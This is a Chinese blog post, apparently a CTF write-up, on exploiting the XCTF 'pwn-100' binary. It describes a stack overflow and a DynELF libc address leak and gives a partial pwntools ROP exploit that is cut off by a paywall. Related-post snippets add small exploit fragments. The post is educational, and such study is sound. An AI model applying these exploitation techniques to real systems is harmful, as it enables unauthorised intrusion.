XCTF pwn-100(使用DynELF)

最新推荐文章于 2020-11-15 08:14:52 发布
最新推荐文章于 2020-11-15 08:14:52 发布
阅读量325 收藏 2
点赞数 2
分类专栏: CTF-PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qin9800/article/details/104759217
版权

查保护
在这里插入图片描述
开了NX,没办法直接往栈上写ShellCode
放入IDA分析
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
参数a1,是栈上的地址;a2是长度200;这个函数存在栈溢出漏洞,这个函数最多可以通过read读取200个字符,而用户输入数据的首地址到ebp只有0x40个字节。
这个程序没有提供libc,也没有后门函数,但是有puts函数,可以通过pwntools的DynELF来泄露地址,也可以使用LibcSearcher
后面讲解exp中用到的3个payload为什么这么构造

from pwn import *

#p = process("./pwn-100")
p = remote("111.198.29.45",42709)
elf = ELF("./pwn-100")

read_got = elf.got['read']
puts_plt = elf.plt['puts']
start = 0x400550
pop_rdi = 0x400763
#ROPgadget --binary "pwn-100" --only "pop|ret" | grep "rdi"
#rdi,rsi,rdx,rcx,r8,r9
def leak(address):
	payload1 = "a" * 0x48 + p64(pop_rdi) + p64(address) + p64(puts_plt) + p64(start)
	payload1 = payload1.ljust(200,"a")
	p.send(payload1)
	p.recvuntil("bye~\n")
	up = ""
	content = ""
	count = 0
	while True:
		c = p.recv(numb=1, timeout=0.5
最低0.47元/天 解锁文章
夏了茶糜
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn-100(L-CTF-2016)的个人想法(含DynELF使用)
fzucaicai的博客
02-15 295
DynELF是一个用于动态获取库函数地址的类,可以在程序运行时获取库函数的地址,而不需要提前知道库函数的地址。在这段代码中,是创建一个DynELFleak是一个用于泄漏内存地址中的内容的函数;elf=elfpwn100程序的ELF对象,用于获取程序中的一些基本信息(如函数地址、数据段地址、代码段地址等)。DynELF类会根据提供的泄漏函数leak中泄漏出来的puts函数地址和程序中的ELF信息,动态计算出libc库的基地址,然后可以使用d.lookup方法根据libc库中的函数名获取该函数的地址。
DynELF
ATFWUS的博客
03-03 463
0x01.概述 DynELFpwntools中专门用来应对没有libc情况的漏洞利用模块,在提供一个目标程序任意地址内存泄漏函数的情况下,可以解析任意加载库的任意符号地址。 对于不同版本的libc,函数首地址相对于文件开头的偏移和函数间的偏移不一定一致;如果题目不提供libc,我们通过泄露任意一个库函数地址计算出system函数地址的方法可能就不太方便了,所以这就要求我们想办法获取目标系统的...
DynELFpwn200
weixin_44464829的博客
11-15 183
在做漏洞利用时,由于 ASLR 的影响,我们在获取某些函数地址的时候,需要一些特殊的操作。一种方法是先泄露出 libc.so 中的某个函数,然后根据函数之间的偏移,计算得到我们需要的函数地址,这种方法的局限性在于我们需要能找到和目标服务器上一样的 libc.so,而有些特殊情况下往往并不能找到。而另一种方法,利用如 pwntools 的 DynELF 模块,对内存进行搜索,直接得到我们需要的函数地址。 DynELFpwntools中专门用来应对无libc情况的漏洞利用模块,其基本代码框架如下。 p.
CTF-PWN-pwn100 (ROP+DynELF定位system函数)
SuperGate的博客
09-24 705
漏洞分析 程序中只开了NX,查看程序逻辑发现: int sub_40068E() { char buf; // [rsp+0h] [rbp-40h] sub_40063D((__int64)&buf, 200); return puts("bye~"); } 使用sub_40063D函数向buf中读取200个字符,显然存在栈溢出。接下来我们要思考如何利用这个漏洞。 观察到程...
ROP实例分析(二)---------------------------DynELF使用
iDevil7的博客
07-13 680
DynELFpwntools中专门用来应对没有libc情况的漏洞利用模块,其基本代码框架如下。需要使用者进行的工作主要集中在leak函数的具体实现上,上面的代码只是个模板。其中,address就是leak函数要泄漏信息的起始地址,而payload就是触发目标程序泄漏address处信息的攻击代码。A.使用条件不管有没有libc文件,要想获得目标系统的system函数地址,首先都要求目标二进制程序...
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 ...由于我的电脑上没有Windows的开发环境,使用python写个程序 发送成功 程序变成这个样子 计算flag 得到flag:thIs_Is_real_kEy_hahaaa 作者:夏了茶糜
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-mobile app2
01-03
然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个文件中包含了大部分程序逻辑 再使用AXMLPrinter2.jar对AndroidManifest.xml进行解包 2.分析文件 使用JD-GUI分析jar文件 找到MainActivity.clss,...
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 2936
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2485
这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到题目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1276
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
CTF writeup 2_南邮网络攻防训练
热门推荐
Troy
10-28 146万+
地址地址WEB签到题这一定是最简单的 传送门:http://chinalover.sinaapp.com/web1/“key在哪里? ” 在源码里~md5 collision源码<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1391
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
XCTF warmup
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-10 1113
这题没有二进制文件 最简单的一个盲打pwn题 。虽然难的题目我还不会 只有一个ip和一个端口 nc连接上去看看 发现程序会给我们返回一个地址 猜测这个地址就是后门函数的地址 写了个爆破程序 from pwn import * def blast(ip,port,padd_start,padd_end,addr): for i in range(padd_start,padd_end): ...
XCTF note-service2
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-09 857
查程序保护机制 开启了PIE和CANARRY 没有开启NX,堆栈具有可执行权限 IDA64载入程序,查看main函数 重点分析sub_E30(); 经过分析得知sub_C56()是一个输出提示信息的函数,sub_B91()是获取用户输入值的函数 sub_DC1();sub_DD4();这两个函数的功能未完成 仅实现了sub_CA5();sub_DE7();这两个函数,这两个函数实现了添加和删...
[BJDCTF 2nd] r2t4
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-24 843
题目下载地址:点此下载 查保护 此处存在格式化字符串漏洞 利用格式化字符串漏洞复写got表中的__stack_chk_fail地址,这个函数的作用是,当程序出现栈溢出的时候执行此函数,利用格式化字符串漏洞把这个函数的got表地址覆盖为后门函数 EXP: from pwn import * context(arch='amd64',os='linux',word_size='64') #p...
[BJDCTF 2nd] test
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-23 634
ssh -p 26619 ctf@node3.buuoj.cn 连接服务器 没有读取flag的权限 看下test.c #include <stdio.h> #include <string.h> #include <stdlib.h> int main(){ char cmd[0x100] = {0}; puts("Welcome to P...
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值